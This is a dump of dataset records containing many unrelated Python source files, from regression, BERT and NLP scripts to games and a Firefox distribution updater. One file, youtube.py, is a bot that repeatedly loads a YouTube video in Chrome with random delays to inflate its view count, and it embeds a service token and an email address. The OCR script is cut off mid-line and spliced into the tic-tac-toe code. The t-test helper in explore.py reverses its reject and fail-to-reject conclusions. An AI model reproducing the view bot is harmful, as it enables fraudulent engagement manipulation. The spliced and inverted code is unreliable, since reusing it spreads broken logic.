diabetes_df_o['Target']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)\n\nlasso = Lasso()\nlasso.fit(X_train, y_train)\n\nprint(f\"Intercept: {lasso.intercept_}\\n\")\nprint(f\"Coeficients: {lasso.coef_}\\n\")\nprint(f\"Named Coeficients: {pd.DataFrame(lasso.coef_, X.columns)}\")\npd.DataFrame(lasso.coef_, X.columns).to_csv(\"Lasso Coefficients\")\n\npredicted_values = lasso.predict(X_test)\n\nfor (real, predicted) in list(zip(y_test, predicted_values)):\n print(f\"Value: {real:.2f}, pred: {predicted:.2f}, diff: {(real - predicted):.2f}\")\n\nsns.set(palette=\"hls\")\nresiduals = y_test - predicted_values\n\nsns.scatterplot(y_test, predicted_values, marker=\"+\")\nplt.plot([0, 300], [0, 300], '--')\nplt.xlabel('Real Value')\nplt.ylabel('Predicted Value')\nplt.title('Lasso Real Value vs Predicted Values')\nplt.savefig('plots/Lasso_Predicted.png')\nplt.clf()\n\nsns.scatterplot(y_test, residuals, marker=\"s\")\nplt.plot([200, 0], [0, 0], '--')\nplt.xlabel('Real Value')\nplt.ylabel('Residuals')\nplt.title('Lasso Real Value vs Residuals')\nplt.savefig('plots/Lasso_Residuals.png')\nplt.clf()\n\nsns.distplot(residuals, bins=20, kde=False)\nplt.plot([0, 0], [50, 0], '--')\nplt.title('Lasso Residual Distribution')\nplt.savefig('plots/Lasso_Residual_Distn.png')\nplt.clf()\nplt.close()\n\nprint(f\"MAE error(avg abs residual): {metrics.mean_absolute_error(y_test, predicted_values)}\")\nprint(f\"MSE error: {metrics.mean_squared_error(y_test, predicted_values)}\")\nprint(f\"RMSE error: {np.sqrt(metrics.mean_squared_error(y_test, predicted_values))}\")","repo_name":"MarisaAlves/Project_Diabetes","sub_path":"Python_Scripts/Lasso_Regression.py","file_name":"Lasso_Regression.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12160638878","text":"import torch\nimport torch.nn as nn\nfrom 
transformers.models.bert.modeling_bert import BertConfig, BertEncoder, BertModel\n\nfrom .model_base.model_embed_base import EmbedLayer\nfrom .model_base.model_mlp import MultiLayerPerceptron\n\n\nclass BidirectionalEncoderRepresentationsfromTransformers(nn.Module):\n \"\"\"\n BERT model\n \"\"\"\n\n def __init__(self, settings):\n \"\"\"\n Initializes BERT Model\n\n Parameters:\n settings(dict): Dictionary containing the settings\n \"\"\"\n\n super().__init__()\n\n # Get settings\n self.embedding_dim = settings[\"bert\"][\"embedding_dim\"]\n self.input_dim = settings[\"bert\"][\"input_dim\"]\n self.label_len_dict = settings[\"label_len_dict\"]\n self.n_layers = settings[\"bert\"][\"n_layers\"]\n self.n_heads = settings[\"bert\"][\"n_heads\"]\n self.dense_layer_dim = settings[\"bert\"][\"dense_layer_dim\"]\n self.non_embed_col = settings[\"non_embedding_columns\"]\n\n # Create embedding layer\n self.embed_layer = EmbedLayer(self.embedding_dim, self.label_len_dict)\n\n # Create input linear layer\n embed_output_dim = self.embed_layer.get_output_dim()\n self.input_lin = nn.Linear(\n embed_output_dim + len(self.non_embed_col), self.input_dim\n )\n\n # Create BERT layer\n self.config = BertConfig(\n 3, # not used\n hidden_size=self.input_dim,\n num_hidden_layers=self.n_layers,\n num_attention_heads=self.n_heads,\n max_position_embeddings=settings[\"bert\"][\"max_seq_len\"],\n )\n\n self.encoder = BertModel(self.config)\n\n # output dense layer\n self.output_lin = MultiLayerPerceptron(self.input_dim, self.dense_layer_dim)\n\n return\n\n def forward(self, x):\n # Get data input size\n input_size = len(x[\"interaction\"])\n\n # Embedding layer\n embedded_x = self.embed_layer(x)\n\n # Combine non-embedding layer\n if len(self.non_embed_col) != 0:\n embedded_x = torch.cat(\n [embedded_x] + [x[i].unsqueeze(2) for i in self.non_embed_col], -1\n )\n\n # Input linear layer\n input_x = self.input_lin(embedded_x)\n\n # BERT layer\n encoded_layers = self.encoder(inputs_embeds=input_x, attention_mask=x[\"mask\"])\n out = encoded_layers[0]\n\n # Dense layer\n out = out.contiguous().view(input_size, -1, self.input_dim)\n out = self.output_lin(out).view(input_size, -1)\n\n return out\n","repo_name":"boostcampaitech5/level2_dkt-recsys-06","sub_path":"code/src/model_folder/model_bert.py","file_name":"model_bert.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18407870815","text":"#!/usr/bin/python3\n\"\"\"Defines a class Square that inherits from class Rectangle\"\"\"\nRectangle = __import__('9-rectangle').Rectangle\n\n\nclass Square(Rectangle):\n \"\"\"Description for the class Square\"\"\"\n\n def __init__(self, size):\n \"\"\"Initializes instances of the class\"\"\"\n\n super().integer_validator('size', size)\n super().__init__(size, size)\n self.__size = size\n","repo_name":"Beldine-Moturi/alx-higher_level_programming","sub_path":"0x0A-python-inheritance/11-square.py","file_name":"11-square.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9085939292","text":"import streamlit as st\nfrom PIL import Image, ImageDraw\nimport time\nimport os\nimport requests\nfrom google.cloud import vision\nfrom google.cloud.vision_v1 import types\nfrom google.oauth2 import service_account\nimport json\nimport uuid\nimport io\n\n# import audio\nimport threading\nfrom multiprocessing import Queue\n\nmaikadomain = 
os.getenv(\"MAIKA_DOMAIN\")\n\n\ncredentials = service_account.Credentials.from_service_account_info(\n dict(st.secrets[\"connection\"][\"gcs\"]), scopes=[\"https://www.googleapis.com/auth/cloud-platform\"]\n)\n\n# def detect_document_text_with_confidence(full_text_annotation, min_confidence=0.9):\n\n# filtered_text_blocks = []\n# for page in full_text_annotation.pages:\n# for block in page.blocks:\n# for paragraph in block.paragraphs:\n# for word in paragraph.words:\n# text = ''.join([symbol.text for symbol in word.symbols])\n# confidence = word.confidence\n# if confidence > min_confidence:\n# filtered_text_blocks.append((text, confidence))\n\n# return filtered_text_blocks\n\n@st.cache_data\ndef get_file_content(image_url):\n response = requests.get(image_url)\n file_content = response.content\n return file_content\n\ndef detect_document_text_with_confidence(full_text_annotation, min_block_conf = 0.0, min_paragraph_conf=0.9, min_word_conf=0.0):\n result=''\n\n for page in full_text_annotation.pages:\n # print(42, page.confidence)\n block_texts = []\n for block in page.blocks:\n if float(block.confidence) < min_block_conf:\n continue\n paragraph_texts = []\n for paragraph in block.paragraphs:\n if float(paragraph.confidence) < min_paragraph_conf: continue\n\n words = []\n # print(48, paragraph.confidence)\n for word in paragraph.words:\n if float(word.confidence) 9:\n raise ValueError(\"User input out of range.\")\n elif board_array[user_input - 1] != Piece.E:\n print(\"Error: This space is not available.\")\n continue\n else:\n position = user_input\n except ValueError:\n print(\"Error: Invalid input.\")\n continue\n\n # Adjust for 0-based index.\n return position - 1\n\ndef user_turn(board_array):\n position = user_choice_prompt(board_array)\n board_array[position] = Piece.X\n\ndef computer_turn(board_array):\n position = random_empty_space_index(board_array)\n board_array[position] = Piece.O\n\ndef get_board_type():\n default = BoardType.NUMBERED\n\n if len(sys.argv) == 2:\n if sys.argv[1] == BoardType.SIMPLE.value:\n return BoardType.SIMPLE\n elif sys.argv[1] == BoardType.NUMBERED.value:\n return BoardType.NUMBERED\n else:\n return default\n else:\n return default\n\n# Main\n\ndef main():\n board_type = get_board_type()\n play_game = True\n while play_game:\n board_array = create_board_array()\n game_is_over = False\n\n print_board(board_type, board_array)\n\n while not game_is_over:\n user_turn(board_array)\n game_is_over = check_for_winner(board_array) or check_for_tie(board_array)\n\n if not game_is_over:\n computer_turn(board_array)\n game_is_over = check_for_winner(board_array) or check_for_tie(board_array)\n\n print_board(board_type, board_array)\n\n if game_is_over:\n check_for_winner(board_array, print_results=True) or check_for_tie(board_array, print_results=True)\n\n print()\n play_again_user_input = input(\"Play again? 
(Y/n) \")\n if play_again_user_input != \"\" and play_again_user_input != \"Y\" and play_again_user_input != \"y\":\n play_game = False\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print()\n print(\"Bye-bye!\")\n quit()","repo_name":"rlziii/Python-Tic-Tac-Toe","sub_path":"tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40755250111","text":"#!/usr/bin/env python\n\nimport argparse\nimport codecs\nimport configparser\nimport datetime\nimport json\nimport os\nimport shutil\nimport zipfile\n\n\nLEGACY_DISTROS = {\n \"baidu\": \"firefox.baidusd\",\n \"baizhu\": \"firefox.dw\",\n \"cumulon\": \"firefox.newhua\",\n \"kingsoft\": \"firefox.kis\",\n \"mainOther\": \"firefox.com.cn\",\n \"mainWinFull\": \"full.firefox.com.cn\",\n \"mainWinStub\": \"stub.firefox.com.cn\",\n \"mainWinStubFallback\": \"firefox.latest\",\n \"mydown\": \"firefox.yesky\",\n \"others\": \"firefox.others\",\n \"qihoo\": \"firefox.3gj\",\n \"tencent\": \"firefox.qm\",\n \"xbsafe\": \"firefox.xbsafe2\",\n \"zol\": \"firefox.zol\"\n}\n\n\ndef update_dist_extension(distro, extensions):\n for ext_id in extensions:\n filename = \"{}.xpi\".format(ext_id)\n\n ext_path = os.path.join(\"..\", distro, \"distribution\",\n \"extensions\", filename)\n if os.path.exists(ext_path):\n print(\"Updating {}\".format(ext_path))\n shutil.copy2(extensions[ext_id], ext_path)\n continue\n\n opt_ext_path = os.path.join(\"..\", distro, \"distribution\",\n \"optional-extensions\", filename)\n if os.path.exists(opt_ext_path):\n print(\"Updating {}\".format(opt_ext_path))\n shutil.copy2(extensions[ext_id], opt_ext_path)\n\n\ndef update_dist_ini(distro, version):\n legacy_distro = LEGACY_DISTROS.get(distro, \"firefox.com.cn\")\n\n cfg = configparser.ConfigParser()\n cfg.optionxform = str\n cfg.read([\n os.path.join(\"templates\", \"distribution.ini\"),\n os.path.join(\"..\", distro, \"dist_addition.ini\")\n ], \"utf-8\")\n\n cfg[\"Global\"][\"version\"] = version\n cfg[\"Preferences\"][\"app.distributor.channel\"] = json.dumps(distro)\n cfg[\"Preferences\"][\"app.partner.{}\".format(distro)] = json.dumps(distro)\n cfg[\"Preferences\"][\"app.chinaedition.channel\"] = json.dumps(legacy_distro)\n\n dist_ini_path = os.path.join(\"..\", distro,\n \"distribution\", \"distribution.ini\")\n print(\"Updating {}\".format(dist_ini_path))\n with codecs.open(dist_ini_path, \"wb\", \"utf-8\") as dist_ini:\n cfg.write(dist_ini, space_around_delimiters=False)\n\n\ndef update_extension(args):\n extensions = {}\n\n if args.ext:\n exts = args.ext\n else:\n ext_dir = os.path.join(\"templates\", \"extensions\")\n exts = [os.path.join(ext_dir, ext_name)\n for ext_name in os.listdir(ext_dir)\n if ext_name.endswith(\".xpi\")]\n\n for ext in exts:\n with zipfile.ZipFile(ext) as ext_file:\n try:\n manifest_file = ext_file.open(\"manifest.json\")\n except KeyError:\n manifest_file = ext_file.open(\"webextension/manifest.json\")\n manifest = json.loads(manifest_file.read().decode(\"utf-8\"))\n manifest_file.close()\n\n ext_id = manifest.get(\"applications\", {}).get(\"gecko\", {}).get(\"id\")\n if not ext_id:\n print(\"id not found for extension: {}\".format(ext))\n continue\n\n extensions[ext_id] = ext\n\n for distro in os.listdir(\"..\"):\n if not os.path.exists(os.path.join(\"..\", distro, \"repack.cfg\")):\n continue\n\n update_dist_extension(distro, extensions)\n\n\n\ndef update_ini(args):\n for 
distro in os.listdir(\"..\"):\n if not os.path.exists(os.path.join(\"..\", distro, \"repack.cfg\")):\n continue\n\n update_dist_ini(distro, \"{}.{}\".format(args.year, args.month))\n\n\ndef main():\n today = datetime.date.today()\n\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(\n description='subcommands to update parts of the each distribution',\n help='run each subcommand to see more details')\n\n ini_parser = subparsers.add_parser('ini')\n ini_parser.add_argument(\"-y\", \"--year\", default=today.year, type=int,\n help=\"set year part of distribution version\", metavar=\"YYYY\")\n ini_parser.add_argument(\"-m\", \"--month\", default=today.month, type=int,\n help=\"set month part of distribution version\", metavar=\"MM\")\n ini_parser.set_defaults(func=update_ini)\n\n ext_parser = subparsers.add_parser('extension')\n ext_parser.add_argument(\"-e\", \"--ext\", nargs='+',\n help=\"the extension file(s) to copy into each distribution\",\n metavar=\"ext.xpi\")\n ext_parser.set_defaults(func=update_extension)\n\n args = parser.parse_args()\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mozilla-partners/mozillaonline","sub_path":"desktop/scripts/update-dist.py","file_name":"update-dist.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"74016025490","text":"# number of words, chars, word freq., sentence freq. audio len\n\nimport sys\nimport re\n\npattern = re.compile('[\\W_]+', re.UNICODE)\n\ntext_path = sys.argv[1] #/home/danni/workspace/data/cv/clean_validated/text'\n#'/home/danni/workspace/data/how2/data/orig/how2-300h-v1/data/train/text.id.en'\n\nword_dict = dict()\nsent_dict = dict()\n\nwith open(text_path, 'r') as f:\n for line in f.readlines():\n words = [pattern.sub('', i.strip()) for i in line.strip().lower().split(' ')[1:]]\n for word in words:\n if word not in word_dict:\n word_dict[word] = 1\n else:\n word_dict[word] += 1\n sent = ' '.join(words)\n if sent not in sent_dict:\n sent_dict[sent] = 1\n else:\n sent_dict[sent] += 1\n\nprint('Vocab size:', len(word_dict))\nprint('Vocab count:')\nfor tup in sorted(word_dict.items(), key=lambda kv: kv[1], reverse=True)[:100]:\n print(tup)\n\nprint('Sent size:', len(sent_dict))\nprint('Sent count:')\nfor tup in sorted(sent_dict.items(), key=lambda kv: kv[1], reverse=True)[:100]:\n print(tup)\n","repo_name":"dannigt/NMTGMinor.lowLatency","sub_path":"smalltools/corpus_stats.py","file_name":"corpus_stats.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"40033945579","text":"'''\n\n explore.py\n\n Description: This file contains functions used for producing visualizations\n and conducting statistical tests in the final report notebook.\n\n Variables:\n\n None\n\n Functions:\n\n plot_target_distribution(df)\n plot_most_frequent_words(df)\n plot_contains_keywords(df)\n plot_bigrams(df)\n plot_readme_size_vs_language(df, group_column = 'language')\n one_sample_ttest(df, sample, column, alternative = 'two-sided')\n\n'''\n\n################################################################################\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats\n\nimport nltk\n\nfrom wordcloud import WordCloud\n\n################################################################################\n\ndef plot_target_distribution(df: pd.DataFrame) 
-> None:\n '''\n Create a plot of the distribution of the target variable \"language\".\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n '''\n\n plt.figure(figsize = (14, 4))\n sns.histplot(data = df, x = 'language')\n\n plt.title('The main programming language for most repositories is not in the top 3 (Python, C++, JavaScript)')\n plt.xlabel('Programming Language')\n \n plt.show()\n\n################################################################################\n\ndef plot_most_frequent_words(df: pd.DataFrame) -> None:\n '''\n Create plots displaying the most frequent words for each programming \n language.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing natural language data. The data should \n ideally be prepared.\n '''\n\n # Show the top 5 most frequent words.\n n = 5\n fig, ax = plt.subplots(ncols = 1, nrows = 3, figsize = (14, 8))\n\n # Get the top 20 most frequent words across all repos.\n clean_words = ' '.join(readme for readme in df.clean)\n clean_words_freq = pd.Series(clean_words.split()).value_counts().head(20)\n\n # Combine all words for each programming language into single strings.\n python_words = ' '.join(text for text in df[df.language == 'Python'].clean)\n cpp_words = ' '.join(text for text in df[df.language == 'C++'].clean)\n javascript_words = ' '.join(text for text in df[df.language == 'JavaScript'].clean).replace(' ', '')\n\n # Remove the top 20 most frequent words across all repos for each group.\n python_words = ' '.join(word for word in python_words.split() if word not in clean_words_freq)\n cpp_words = ' '.join(word for word in cpp_words.split() if word not in clean_words_freq)\n javascript_words = ' '.join(word for word in javascript_words.split() if word not in clean_words_freq)\n\n # Create plots for the most frequent words for each programming language\n\n python_words_freq = pd.Series(python_words.split())\n python_words_freq.value_counts().head(n).plot.barh(ax = ax[0])\n ax[0].set_title('Most Frequent Words in Python Repository READMEs')\n ax[0].set_xlabel('Word Count')\n ax[0].set_ylabel('Words')\n\n cpp_words_freq = pd.Series(cpp_words.split())\n cpp_words_freq.value_counts().head(n).plot.barh(ax = ax[1])\n ax[1].set_title('Most Frequent Words in C++ Repository READMEs')\n ax[1].set_xlabel('Word Count')\n ax[1].set_ylabel('Words')\n\n javascript_words_freq = pd.Series(javascript_words.split())\n javascript_words_freq.value_counts().head(n).plot.barh(ax = ax[2])\n ax[2].set_title('Most Frequent Words in JavaScript Repository READMEs')\n ax[2].set_xlabel('Word Count')\n ax[2].set_ylabel('Words')\n\n plt.tight_layout()\n\n plt.show()\n\n################################################################################\n\ndef plot_contains_keywords(df: pd.DataFrame) -> None:\n '''\n Plot a distribution of the contains_keywords features for each \n programming language.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n '''\n\n fig, ax = plt.subplots(ncols = 3, nrows = 1, figsize = (14, 4))\n\n sns.histplot(data = df[df.language == 'Python'], x = 'contains_python_keywords', ax = ax[0])\n ax[0].set_title('Python Repositories')\n ax[0].set_xlabel('Contains Python Keywords')\n\n sns.histplot(data = df[df.language == 'C++'], x = 'contains_cpp_keywords', ax = ax[1])\n ax[1].set_title('C++ Repositories')\n ax[1].set_xlabel('Contains C++ Keywords')\n\n sns.histplot(data = df[df.language == 'JavaScript'], x = 'contains_js_keywords', ax = ax[2])\n 
ax[2].set_title('JavaScript Repositories')\n ax[2].set_xlabel('Contains JavaScript Keywords')\n\n plt.show()\n\n################################################################################\n\ndef plot_bigrams(df: pd.DataFrame) -> None:\n '''\n Create plots displaying the most common bi-grams for each programming \n language.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n '''\n\n fig, ax = plt.subplots(ncols = 1, nrows = 3, figsize = (14, 8))\n\n python_clean_words = ' '.join(readme for readme in df[df.language == 'Python'].clean)\n cpp_clean_words = ' '.join(readme for readme in df[df.language == 'C++'].clean)\n javascript_clean_words = ' '.join(readme for readme in df[df.language == 'JavaScript'].clean).replace(' ', '')\n\n python_bigrams = pd.Series(nltk.bigrams(python_clean_words.split()))\n python_bigrams.value_counts().head(5).plot.barh(ax = ax[0])\n ax[0].set_title('Most common bi-grams for Python repositories')\n ax[0].set_xlabel('Count')\n ax[0].set_ylabel('Bi-Gram')\n\n cpp_bigrams = pd.Series(nltk.bigrams(cpp_clean_words.split()))\n cpp_bigrams.value_counts().head(5).plot.barh(ax = ax[1])\n ax[1].set_title('Most common bi-grams for C++ repositories')\n ax[1].set_xlabel('Count')\n ax[1].set_ylabel('Bi-Gram')\n\n javascript_bigrams = pd.Series(nltk.bigrams(javascript_clean_words.split()))\n javascript_bigrams.value_counts().head(5).plot.barh(ax = ax[2])\n ax[2].set_title('Most common bi-grams for JavaScript repositories')\n ax[2].set_xlabel('Count')\n ax[2].set_ylabel('Bi-Gram')\n\n plt.tight_layout()\n\n plt.show()\n\n################################################################################\n\ndef plot_readme_size_vs_language(df: pd.DataFrame, group_column: str = 'language') -> None:\n '''\n Create a plot that shows the average readme size grouping by the \n group_column parameter. By default this will show the average readme \n size for each programming language in the target variable.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the readme data.\n\n group_column: str, optional\n The column to group the data by.\n '''\n\n plt.figure(figsize = (14, 4))\n\n df.groupby(group_column).readme_size.mean().plot.barh()\n plt.title('Average README file size by programming language')\n\n plt.xlabel('Average Character Count')\n plt.ylabel('Programming Language')\n\n plt.show()\n\n################################################################################\n\ndef one_sample_ttest(df: pd.DataFrame, sample: pd.DataFrame, column: str, alternative: str = 'two-sided') -> None:\n '''\n Conduct a one sample t-test using the provided dataframe and sample \n dataframe. The hypothesis is tested on the column parameter. By \n default a two sided t-test is conducted.\n \n Parameters\n ----------\n df: DataFrame\n A pandas dataframe containing the full population of the data.\n\n sample: DataFrame\n A pandas dataframe containing the sample that is being tested.\n\n column: str\n The feature in the data that will be tested.\n\n alternative: str, optional\n The type of t-test to perform. 
The default is a two-sided t-test.\n '''\n\n alpha = 0.05\n\n t, p = stats.ttest_1samp(sample[column], df[column].mean(), alternative = alternative)\n\n if p < alpha:\n print('Fail to reject H0')\n else:\n print('Reject H0')","repo_name":"Garcia-Hensley-Nichols-NLP-project/GHN-NLP-project","sub_path":"explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":8230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8614083840","text":"# Built from code from: https://www.pluralsight.com/guides/building-a-twitter-sentiment-analysis-in-python\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport string\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import wordpunct_tokenize\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom nltk.stem import PorterStemmer\r\nfrom nltk.stem import LancasterStemmer\r\nfrom nltk.stem.util import prefix_replace\r\nfrom nltk.stem.util import suffix_replace\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport nltk\r\n# run first time\r\n# nltk.download('stopwords')\r\n# nltk.download('punkt')\r\n# nltk.download('wordnet')\r\n# nltk.download('omw-1.4')\r\n\r\n# Read in file\r\ndf = pd.read_excel(\"Sample Tweets.xlsx\", sheet_name = 'Ratings').drop(columns = ['Unnamed: 0'])\r\n\r\n# count CAPITAL words, excluding I and A - does include positions and acronyms though\r\ndf['capitals'] = [len(re.findall(r'\\b[A-Z]+\\b(?\\?@\\[\\\\\\]\\^_`{\\|}~]\",' ', new_tweet)\r\n \r\n # Replace abreviations that require numbers\r\n new_tweet = new_tweet.replace(' s ', ' safety ') # as in S and not 80s, 90s, etc.\r\n new_tweet = new_tweet.replace(' b4 ', ' before ')\r\n \r\n # Remove all numbers\r\n new_tweet = re.sub(r'\\d', '', new_tweet)\r\n \r\n # Replace abreviations with punctuation and numbers gone\r\n for old, new in abr_dict.items():\r\n new_tweet = new_tweet.replace(old, new)\r\n\r\n tweet_tokens = wordpunct_tokenize(new_tweet) # separates words and punctuation and spellchecks (sometimes)\r\n \r\n # Remove emojis and weird (non-english alphabet) characters\r\n demoji = [w.encode('ascii', 'ignore').decode('ascii') for w in tweet_tokens]\r\n # Remove stop words\r\n filtered_words = [w for w in demoji if not w in stop_words]\r\n\r\n # stemm\r\n ps = PorterStemmer() # removes suffixes - makes it look very strange and unreadable, including proper nouns\r\n # ls = LancasterStemmer() # more aggressive suffix removal\r\n stemmed_words = [ps.stem(w) for w in filtered_words]\r\n # stemmed_words = [ls.stem(w) for w in filtered_words]\r\n \r\n # lemmatize\r\n lemmatizer = WordNetLemmatizer()\r\n lemma_words = [lemmatizer.lemmatize(w, pos='v') for w in stemmed_words] # changes verbs to same tense\r\n \r\n # Remove single letters left (d and c from d.c., s from 80s, etc.)\r\n final_words = [w for w in lemma_words if len(w) > 1]\r\n # join words again\r\n final_tweet = \" \".join(final_words)\r\n # Remove extra whitespace\r\n # final_tweet = \" \".join(final_tweet.split())\r\n\r\n \r\n return final_tweet\r\n\r\n# Preprocess data\r\ndf.text = df['text'].apply(preprocess_tweet_text)\r\n\r\ndf.rename(columns = {'Sentiment Rating' : 'sentiment'}, inplace = 
True)\r\ndf.to_csv(\"preprocessed_tweets.csv\")\r\n","repo_name":"sarah2wise/nfl_twitter_prediction","sub_path":"Preprocessing_Text.py","file_name":"Preprocessing_Text.py","file_ext":"py","file_size_in_byte":9672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24491746906","text":"import concurrent.futures\r\nimport BlynkLib\r\nimport sys\r\nimport time \r\nimport requests\r\nimport random\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\nif sys.version_info[0] > 2:\r\n\tfrom http.cookiejar import LWPCookieJar\r\n\tfrom urllib.request import Request, urlopen\r\n\tfrom urllib.parse import quote_plus, urlparse, parse_qs\r\nelse:\r\n\tfrom cookielib import LWPCookieJar\r\n\tfrom urllib import quote_plus\r\n\tfrom urllib2 import Request, urlopen\r\n\tfrom urlparse import urlparse, parse_qs\r\n\r\n\r\n_URL = 'https://www.youtube.com/watch?v=NrzLnl3tH0U?autoplay=1'\r\n_MAIL = 'thuykieulk1999@gmail.com'\r\n_VIEW = 0\r\n\r\nblynk = BlynkLib.Blynk(token = 'e80ff069a180413cb357e059bb0a1568' , server = 'blynk.getblocky.com')\r\nimport _thread\r\n_thread.start_new_thread(blynk.run,())\r\n\r\nwhile blynk.state != BlynkLib.AUTHENTICATED:\r\n pass\r\n\r\ndef _viewCount():\r\n html = requests.get(_URL).text.split('\\n')\r\n for x in html :\r\n if 'watch-view-count' in x :\r\n viewCount = int(x[116:].split(' ')[0])\r\n return viewCount\r\n return None\r\n\r\ndef _viewCheckRoutine():\r\n while True :\r\n time.sleep(10)\r\n currentCount = _viewCount()\r\n if currentCount != _VIEW :\r\n currentCount = _VIEW\r\n blynk.email(_MAIL , \"Youtube View\" , \"View : {}\".format(_viewCount()))\r\n_thread.start_new_thread(_viewCheckRoutine,())\r\n\r\ndef randomDelay():\r\n delayTime = random.randrange(20 , 50)\r\n time.sleep(delayTime)\r\n\r\n\r\ndef chromeThread (a=0):\r\n for i in range(5):\r\n if i <5:\r\n randomDelay()\r\n web = webdriver.Chrome()\r\n web.get(_URL)\r\n time.sleep(120)\r\n randomDelay()\r\n web.quit()\r\n else:\r\n break\r\n\r\n\r\n\r\n\r\n\r\nwith concurrent.futures.ThreadPoolExecutor (max_workers=4) as ex :\r\n threads = {ex.submit(chromeThread,0) : 0 for i in range(1)}\r\n for future in concurrent.futures.as_completed(threads):\r\n url = threads[future]\r\n try :\r\n data = future.result()\r\n except Exception as err:\r\n print(err)\r\n","repo_name":"ltdpttk/pass","sub_path":"youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73278266130","text":"import itertools\r\n\r\ndef dev_options_form_parts(patrs_number):\r\n option = [1,0]\r\n option_list = []\r\n n=0\r\n while n < patrs_number:\r\n for rec in option:\r\n print(rec)\r\n \r\n option_list.append(option + 0)\r\n #option_list.append(option + 1)\r\n n = n+1\r\n return option_list\r\n# i läuft von 1 bis n\r\n#soll eine [0,1] generieren\r\n#diese verduppeln\r\n#jedes element aus [[0,1,0,0,i],[2i]] mit nx1 und 2nx0 erweitern\r\n\r\ndef gen_all_possible_job_sequences(jobs_data):\r\n jobs =[]\r\n for operation, job_list in jobs_data.items():\r\n for job in job_list:\r\n jobs.append(job)\r\n\r\n job_possibilities =itertools.permutations(jobs)\r\n return\r\n","repo_name":"wasilina83/opt_jobshop","sub_path":"optionsgenerator.py","file_name":"optionsgenerator.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 
+{"seq_id":"36571544221","text":"import os\nimport art\n\nart\n\nno_more_bidders = False\n\nbids = {}\n\ndef find_highest_bidder(bids):\n\n highest_bid = 0\n winner = \"\"\n\n for bidder in bids:\n bid_amount = bids[bidder]\n if bid_amount > highest_bid:\n highest_bid = bid_amount\n winner = bidder\n os.system('cls')\n print(f\"The winner is {winner} with a bid of £{highest_bid}\")\n\nwhile not no_more_bidders:\n\n name = input(\"Please enter your name: \")\n bid = int(input(\"Please enter your bid: \"))\n\n bids[name] = bid\n\n if input(\"Are there any more bidders? Yes / No : \").lower() == \"no\":\n no_more_bidders = True\n find_highest_bidder(bids)\n\n else:\n os.system('cls')\n\n","repo_name":"dcooper-holmes/PythonProjects","sub_path":"100-Days-Of-Code/Day-9-Secret-Auction/SecretAuction.py","file_name":"SecretAuction.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40003010510","text":"import math\n\ndef nCr(n,r):\n Nf=math.factorial(n)\n Rf=math.factorial(r)\n NminusRf=math.factorial(n-r)\n return Nf//(Rf*NminusRf)\n\n# n,r=map(int,input().split())\nn=input(\"n>>\")\nr=input(\"r>>\")\n\nprint(nCr(n,r))","repo_name":"shinkeonkim/KMU_Class","sub_path":"1-1/python/funtion_factorial.py","file_name":"funtion_factorial.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10315422689","text":"import pandas as pd\r\nimport numpy as np\r\n\r\ndef PLcalc(lastweek, thisweek):\r\n \tS= 'S' # prefix\r\n \tT = '.txt' # suffix\r\n \tBS = 'BS'\r\n\r\n \tdate = str(lastweek) # date\r\n \tFNlast = S+date+T # filename\r\n \tSlast = pd.read_table(FNlast, sep=' ', header=None)\r\n\r\n \tdate = str(thisweek) # date\r\n \tFNthis = S+date+T # filename\r\n \tSthis = pd.read_table(FNthis, sep=' ', header=None)\r\n\r\n \tdate = str(lastweek)\r\n \tFNBSlast = BS+date+T\r\n \tBSlast = pd.read_table(FNBSlast,sep=' ', header=None )\r\n \t#print(BSlast)\r\n\r\n \tPL = ((Sthis[1]-Slast[1])/Slast[1]*BSlast[1])+((Sthis[2]-Slast[2])/Slast[2]*BSlast[2])\r\n \t#print(PL)\r\n\r\n \tCthis = BSlast[0]\r\n \tAthis0 = 